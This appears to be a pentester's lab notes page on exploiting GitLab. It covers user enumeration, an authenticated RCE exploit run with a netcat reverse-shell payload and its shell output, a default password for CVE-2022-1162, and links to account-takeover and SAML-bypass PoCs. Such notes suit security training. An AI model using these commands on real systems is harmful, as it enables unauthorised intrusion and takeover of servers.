GitLab

Gitlab exploitation

Footprinting & Discovery

http://gitlab.inlanefreight.local:8081/users/sign_in

The only way to footprint the GitLab version number in use is by browsing to the /help page when logged in

Enumeration

Browse to /explore and see if there are any public projects that may contain something interesting.

Check and see if we can register an account and access additional projects

User Enumeration

http://gitlab.inlanefreight.local:8081/users/sign_up

GitLab Community Edition (CE) 13.10.3 - User EnumerationExploit Database

GitHub - dpgg101/GitLabUserEnum: GitLab User EnumerationGitHub

GitLab's defaults are set to 10 failed attempts resulting in an automatic unlock after 10 minutes

./gitlab_userenum.sh --url http://gitlab.inlanefreight.local:8081/ --userlist users.txt

---

Authenticated Remote Code Execution

GitLab Community Edition version 13.10.2 and lower suffered from an authenticated remote code execution

Gitlab 13.10.2 - Remote Code Execution (Authenticated)Exploit Database

If we encounter a vulnerable version of GitLab that allows for self-registration, we can quickly sign up for an account and pull off the attack. Else, OSINT or password guessing

python3 gitlab_13_10_2_rce.py -t http://gitlab.inlanefreight.local:8081 -u mrb3n -p password1 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.15 8443 >/tmp/f '

[1] Authenticating
Successfully Authenticated
[2] Creating Payload 
[3] Creating Snippet and Uploading
[+] RCE Triggered !!

nc -lnvp 8443

listening on [any] 8443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.201.88] 60054

git@app04:~/gitlab-workhorse$ id

id
uid=996(git) gid=997(git) groups=997(git)

Gitlab 14.9 CVE-2022-1162

New Gitlab Accounts (created since the first affect version and if Gitlab is before the patched version) can be logged into with the following password:

123qweQWE!@#000000000

Source: https://x.com/HackerGautam/status/1520624546654867456

CVE-2023-7028 - Admin Account Take Over

Account-Take-Over vulnerability that allows users to take control of the gitlab administrator account without user interaction

GitHub - Vozec/CVE-2023-7028: This repository presents a proof-of-concept of CVE-2023-7028GitHub

GitLab Authentication Bypass (CVE-2024-45409)

All the following GitLab (CE/EE) versions are vulnerable:

• < 16.11.10

• 17.0.0 < 17.0.8

• 17.0.0 < 17.1.8

• 17.0.0 < 17.2.7

• 17.0.0 < 17.3.3

Ruby-SAML / GitLab Authentication Bypass (CVE-2024-45409) — ProjectDiscovery BlogProjectDiscovery

https://blog.projectdiscovery.io/content/media/2024/10/Screen-Recording-2024-10-04-at-10.13.31-PM.mp4blog.projectdiscovery.io

GitHub - synacktiv/CVE-2024-45409: Ruby-SAML / GitLab Authentication Bypass (CVE-2024-45409) exploitGitHub

Resources

https://ppn.snovvcrash.rocks/pentest/infrastructure/devops/gitlabppn.snovvcrash.rocks

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more

• Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them

• Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.